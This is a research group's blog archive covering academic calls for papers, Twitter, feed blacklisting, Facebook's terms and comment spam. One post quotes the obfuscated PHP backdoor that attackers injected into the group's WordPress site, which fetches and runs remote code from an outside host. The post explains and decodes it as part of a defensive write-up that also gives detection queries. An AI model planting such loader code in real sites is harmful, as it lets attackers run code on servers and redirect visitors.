Archive for the 'Blogging' Category
June 27th, 2009, by Tim Finin, posted in Blogging, Semantic Web, Social media, Wikipedia
Important dates:
- abstracts: 21 Sept 09
- submissions: 01 Oct 09
- notification: 15 Dec 09
- final copy: 15 Jan 10
- publication: April 10
The Journal of Web Semantics will publish a special issue on Data Mining and Social Network Analysis for integrating Semantic Web and Web 2.0 in the spring of 2010. The special issue will be edited by Bettina Berendt, Andreas Hotho and Gerd Stumme and initial abstracts for papers must be submitted via the Elsevier EES system by September 21, 2009.
The special issue invites contributions that show how synergies between Semantic Web and Web 2.0 techniques can be successfully used. Since both communities work on network-like data structures, analysis methods from different fields of research could form a link between those communities. Techniques can be - but are not limited to - social network analysis, graph analysis, machine learning and data mining methods.
Relevant topics include
- ontology learning from Web 2.0 data
- instance extraction from Web 2.0 systems
- analysis of Blogs
- discovering social structures and communities
- predicting trends and user behaviour
- analysis of dynamic networks
- using content of the Web for modelling
- discovering misuse and fraud
- network analysis of social resource sharing systems
- analysis of folksonomies and other Web 2.0 data structures
- analysis of Web 2.0 applications and their data
- deriving profiles from usage
- personalized delivery of news and journals
- Semantic Web personalization
- Semantic Web technologies for recommender systems
- ubiquitous data mining in Web (2.0) environment
- applications
May 21st, 2009, by Tim Finin, posted in Ebiquity, Google, Security, splog
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old Wordpress installation was exploited to add the following code to the top of our blog’s main page.
< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest Wordpress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
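The reversed URL is easy to recover. As a small illustration (in Python rather than the PHP of the injected code), reversing the string literal passed to strrev() shows where the snippet pulls its payload from. Nothing is fetched here; the variable names are ours, chosen for the example.

```python
# The string literal passed to strrev() in the injected code, copied from above.
obfuscated = "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"

# PHP's strrev() reverses a string; slicing with a step of -1 does the same in Python.
payload_url = obfuscated[::-1]

print(payload_url)
```

The recovered address is on the same blogwp.info host that appears in the $stprot variable of the injected code.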
We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
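For anyone who wants to set up similar alerts for their own site, here is a minimal sketch of how such queries can be assembled. The function name build_alert_query is made up for this example; the output is just the text you would paste into a Google alert, and no Google API is involved.

```python
def build_alert_query(terms, site):
    """Join spam-related terms with OR and restrict the search to one site."""
    return " OR ".join(terms) + " site:" + site


# One of the two term lists shown above.
pharma_terms = ["viagra", "cialis", "levitra", "Phentermine", "Xanax"]

query = build_alert_query(pharma_terms, "ebiquity.umbc.edu")
print(query)
```

Keeping the term lists short and topical, as in the two alerts above, probably helps keep the number of false positives manageable.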

The results of this Google search reveal many compromised blogs from the .edu domain.
May 11th, 2009, by Tim Finin, posted in Blogging, Programming, Social media, Twitter
We all know that some programming languages are a joy to use and others can be damned painful. Lukas Biewald ran an interesting experiment to gather some data about this in his post, The Programming Language with the Happiest Users.
“Which languages make programmers the happiest? … I decided to do a little market research. I scraped the top 150 most recent tweets on Twitter for the query “X language” where X was one of {COBOL, Ruby, Fortran, Python, Visual Basic, Perl, Java, Haskell, Lisp, C}. Then I asked three people on Amazon Mechanical Turk to verify that the tweet was on the topic. If so, I asked if the tweet seemed positive, negative or neutral. …”
Great idea and a nice use of Amazon Mechanical Turk!
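The quoted description does not say how the three workers' answers were combined, so the following is only a sketch under one plausible assumption: take the majority label for each tweet and report the share of positive tweets among those with a clear verdict. The function names and the sample judgments are invented for illustration.

```python
from collections import Counter


def majority_label(labels):
    """Return the label chosen by more than half of the workers, else None."""
    label, count = Counter(labels).most_common(1)[0]
    return label if count > len(labels) / 2 else None


def positive_share(judged_tweets):
    """Fraction of tweets with a clear verdict whose verdict is 'positive'."""
    verdicts = [majority_label(labels) for labels in judged_tweets]
    decided = [v for v in verdicts if v is not None]
    if not decided:
        return 0.0
    return decided.count("positive") / len(decided)


# Made-up judgments: one inner list per tweet, one label per worker.
sample = [
    ["positive", "positive", "neutral"],
    ["negative", "negative", "negative"],
    ["positive", "neutral", "negative"],  # no majority, so it is skipped
    ["positive", "positive", "positive"],
]
print(positive_share(sample))
```

Running the same calculation once per language would give one score per language to compare.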
May 7th, 2009, by Tim Finin, posted in Google, Social media, splog
We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.
Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. (I was able to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)
We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to Feedburner.
My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.
One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.
So, my guess is that Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.
If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.
By the way, we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us at planet-smr at cs.umbc.edu.
update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added it when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.
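A forgotten /etc/hosts entry like this is easy to check for. The sketch below lists hosts-file entries that pin a given domain or its subdomains to a fixed address. The helper names and the sample file contents are hypothetical, and the address comes from a range reserved for documentation.

```python
def hosts_entries(hosts_text):
    """Yield (ip, hostname) pairs from text in /etc/hosts format."""
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            yield ip, name


def pinned_addresses(hosts_text, domain):
    """Return entries whose hostname is the domain or one of its subdomains."""
    domain = domain.lower()
    return [
        (ip, name)
        for ip, name in hosts_entries(hosts_text)
        if name.lower() == domain or name.lower().endswith("." + domain)
    ]


# Hypothetical file contents; the address is from a documentation-only range.
sample = """
127.0.0.1   localhost
192.0.2.10  feeds.example.org   # temporary workaround, remove later
"""
print(pinned_addresses(sample, "example.org"))
```

On a real server you would read the text from /etc/hosts and compare any hits against what DNS currently returns for the same names.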
April 3rd, 2009, by Tim Finin, posted in Blogging, Twitter, UMBC
Earlier this week the Baltimore Sun’s Andrew Ratner had a story on Twitter, When did Twitter take over the universe? The story had this interesting quote from UMBC’s Zeynep Tufekci:
Some people who study technology aren’t sure Twitter will endure.
“Frankly, I think a lot of twittering is somewhat faddish, whereas I never thought Facebook was. … People I interviewed and surveyed would talk of serious feeling of deprivation without Facebook and I’ve hardly heard anyone say that about twitter,” Zeynep Tufekci, an assistant professor who teaches the sociology of technology at the University of Maryland, Baltimore County, wrote in an e-mail. “Will people Twitter five years from now? Perhaps, but I would not be surprised if they did not, or at least as much.”
March 1st, 2009, by Tim Finin, posted in Blogging, Social media
Traditional newspapers are in a crisis. Last week the 150-year-old Rocky Mountain News published its last issue and the Philadelphia Inquirer filed for bankruptcy. Experts have been saying for some time that newspapers need to focus on the one aspect that cannot be commoditized: local news. It’s also clear that news content delivered via ink on dead trees is not a working model for the future.
Jeff Jarvis, director of CUNY’s interactive journalism program, describes one new experiment that sounds very promising in a post titled The Times & CUNY (and others) go hyperlocal.
The New York Times is about to announce that it is starting a hyperlocal product called The Local working with our students at CUNY’s Graduate School of Journalism. PaidContent has the story early. So I’ll tell you about the school’s and my involvement and plans.
At CUNY, we were working on a hyperlocal plan of our own, aimed at taking one New York neighborhood and turning it into the ultimate hyperlocal community as a showcase to both demonstrate how a community could be empowered to report on itself and to create a laboratory where our students could learn to interact with the public in new and collaborative ways. The problem with teaching interactive journalism, which is what we call my department, is that students don’t have a public with whom to interact.
February 18th, 2009, by Tim Finin, posted in Blogging, Privacy, Social media
Late last night Facebook CEO Mark Zuckerberg announced in a blog post, Update on Terms, that they have rolled back the recent changes to their Terms of Service agreement and restored the previous one.
“Many of us at Facebook spent most of today discussing how best to move forward. One approach would have been to quickly amend the new terms with new language to clarify our positions further. Another approach was simply to revert to our old terms while we begin working on our next version. As we thought through this, we reached out to respected organizations to get their input.
Going forward, we’ve decided to take a new approach towards developing our terms. We concluded that returning to our previous terms was the right thing for now. As I said yesterday, we think that a lot of the language in our terms is overly formal and protective so we don’t plan to leave it there for long.”
The NYT reported the change in a story today, Facebook Withdraws Changes in Data Use.
In his post, Zuckerberg continued by observing that with 175 million members, if Facebook were a country, it would be the sixth most populated one in the world. Of course, sometimes a population revolts and lays claim to certain unalienable rights, among them being life, liberty, pursuit of happiness and ownership of one’s online content.
So, the missing clause is back in the FB TOS:
“You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.”
This revision is dated 23 September 2008. Curiously, I checked the Internet Archive to review the history of FB’s TOS but found that there are no archived copies after 12 October 2007. I can only imagine that FB asked the Internet Archive to stop saving copies of this public page. I note that the last archived copies of many of their public pages (e.g., privacy policy, developers page, etc.) are also from 2007. These pages are not blocked by the FB robots.txt and are normally accessible to anyone, so it must be by a specific request that they not be archived.
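Checking whether a page is blocked by robots.txt is something Python's standard library can do. Here is a minimal sketch that evaluates robots.txt rules supplied as text, so nothing is fetched. The rules, the crawler name example-archiver and the URLs are all hypothetical and are not Facebook's actual robots.txt or the Internet Archive's actual crawler name.

```python
from urllib.robotparser import RobotFileParser


def allowed_for(robots_txt, user_agent, url):
    """Check a URL against robots.txt rules supplied as text (nothing is fetched)."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)


# Hypothetical rules and URLs, for illustration only.
rules = """
User-agent: *
Disallow: /private/
"""
print(allowed_for(rules, "example-archiver", "http://example.com/terms.php"))
print(allowed_for(rules, "example-archiver", "http://example.com/private/notes"))
```

A page that passes this kind of check and is publicly readable would normally be eligible for archiving, which is why the missing copies stand out.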
That’s too bad. Having an easy way to see how the policies of important social sites like FB evolve would be a great resource to those who study online social media as well as to many curious users.
October 19th, 2008, by Tim Finin, posted in Blogging, Social media, Web
Andrew Sullivan has an article, Why I Blog, in the November issue of The Atlantic in which he talks about blogging and why he does it.
“From the first few days of using the form, I was hooked. The simple experience of being able to directly broadcast my own words to readers was an exhilarating literary liberation. Unlike the current generation of writers, who have only ever blogged, I knew firsthand what the alternative meant. I’d edited a weekly print magazine, The New Republic, for five years, and written countless columns and essays for a variety of traditional outlets. And in all this, I’d often chafed, as most writers do, at the endless delays, revisions, office politics, editorial fights, and last-minute cuts for space that dead-tree publishing entails. Blogging—even to an audience of a few hundred in the early days—was intoxicatingly free in comparison. Like taking a narcotic.”
Sullivan is a good writer and an early adopter of the blogging form. He is often controversial, unusually provocative, and worth reading.
September 29th, 2008, by Tim Finin, posted in Blogging, GENERAL, Mobile Computing, Social media
The NYT has a short note (Letting Our Fingers Do the Talking) on a new Nielsen Mobile report on texting use in the US.
“In the fourth quarter of 2007, American cellphone subscribers for the first time sent text messages more than they phoned, according to Nielsen Mobile. Since then, the average subscriber’s volume of text messages has shot upward by 64 percent, while the average number of calls has dropped slightly.”
The article also points out that “Teenagers ages 13 to 17 are by far the most prolific texters, sending or receiving 1,742 messages a month”. The Nielsen data shows that this age group sends two orders of magnitude more data than people over 65.
Note that texting is more popular than calling for all but the last three age groups.
July 8th, 2008, by Anupam Joshi, posted in AI, Blogging, Datamining, Social media, Twitter, Web 2.0, cloud computing
Here at Ebiquity, we’ve had a number of great grad students. One of them, Akshay Java, hacked out a search engine for Twitter posts around early April last year and named it twitterment. He blogged about it here first. He did it without the benefit of the XMPP updates, by parsing the public timeline. It got talked about in the blogosphere (including by Scoble), got some press, and there was an article in the MIT Tech Review that used his visualization of some of the Twitter links. It even got talked about in Wired’s blog, something we found out only yesterday. We were also told that three days after the post in Wired’s blog, someone somewhere registered the domain twitterment.com (I won’t feed them pagerank by linking!) and set up a page that looks very similar to Akshay’s. It has Google Adsense, and of course just passes the query to Google with a site restriction to Twitter. So they’re poaching coffee and cookie money from the students in our lab.
So of course we played with Akshay’s hack and hosted it on one of our university boxes for a few months, but didn’t really have the bandwidth or compute (or time) resources to keep up. Startups such as summize appeared later and provided similar functionality. For the last week or two we’ve been moving the code of twitterment to Amazon’s cloud to restart the service. Of course, today comes the news that Twitter might buy summize, quasi confirmed by Om Malik. Lesson to you grad students: if you come up with something clever, file an invention disclosure with your university’s tech transfer folks. And don’t listen to your advisors if they think that there isn’t a paper in what you’ve hacked; there may yet be a few million dollars in it.
July 1st, 2008, by Tim Finin, posted in Social media, Web, splog
The Washington Post’s Security Fix blog has a post, Amazon: Hey Spammers, Get Off My Cloud!, reporting on allegations that spammers are starting to use Amazon’s Elastic Compute Cloud (EC2) servers. It only makes sense: you can sign up easily without committing to a contract of any length, the price is low, and the IP addresses are drawn from a wide range, making it hard to block them all. Besides, if Amazon’s EC2 IP addresses all get put in a spam blacklist, it will be bad for their many legitimate users. It may be tricky for Amazon to police this.
July 1st, 2008, by Tim Finin, posted in Social media, splog
A good fraction of the comment spam that makes it through our Akismet filter is from people who are trying to add a comment to one of our posts about spam blogs or comments. Here’s an example from today’s batch: a comment on a two-year-old post, Blog comment spam with plagiarized text: hard to spot, sent from Cameroun and trying to promote the site africapresse.com.
“spam is a real problem in this day not just for .edu but for the entire internet world. Plagiarism is a problem too.”
It’s easy for me to classify this as spam since the comment was made on a very old post, is short, includes a reference to a site that looks commercial, and makes a few general and superficial statements that are not really tied to any of the post’s details.
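The four cues above can be written down as a simple checklist. This is only a sketch of that informal reasoning, not how Akismet or any real filter works; the Comment fields, the function name and the thresholds (one year, 150 characters) are assumptions made up for the example.

```python
from dataclasses import dataclass


@dataclass
class Comment:
    text: str
    post_age_days: int
    links_commercial_site: bool
    mentions_post_details: bool


def spam_signals(comment, old_post_days=365, short_text_chars=150):
    """Return the names of the warning signs that a comment triggers."""
    signals = []
    if comment.post_age_days >= old_post_days:
        signals.append("old post")
    if len(comment.text) <= short_text_chars:
        signals.append("short")
    if comment.links_commercial_site:
        signals.append("commercial link")
    if not comment.mentions_post_details:
        signals.append("generic text")
    return signals


# The comment quoted above, with the other fields filled in by hand.
example = Comment(
    text="spam is a real problem in this day not just for .edu but for the "
         "entire internet world. Plagiarism is a problem too.",
    post_age_days=2 * 365,
    links_commercial_site=True,
    mentions_post_details=False,
)
print(spam_signals(example))
```

The two boolean fields still need a human (or another classifier) to fill them in, which is where the hard part of the problem lives.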
I think it’s ironic that so many SEO wannabes try to spam posts about spam. I guess they just have spam on the brain. So, I offer up this post as food for the comment spammers and their search and comment tools.
akismet, anti-spam, antispam, automated, automated, automatic, backlink, backlinks, bad behavior, blacklist, block, blocking, blog, blogging, capcha, comment, comment spam, comments, human, keywords, links, links, nofollow, pagerank, people, plagiarize, plagiarism, rank, search engine optimization, seo, spam, spam blogs, spam comments, spam karma, spamming, splog, splog, splogs, steal, target, trackbacks, traffic, typepad, wordpress.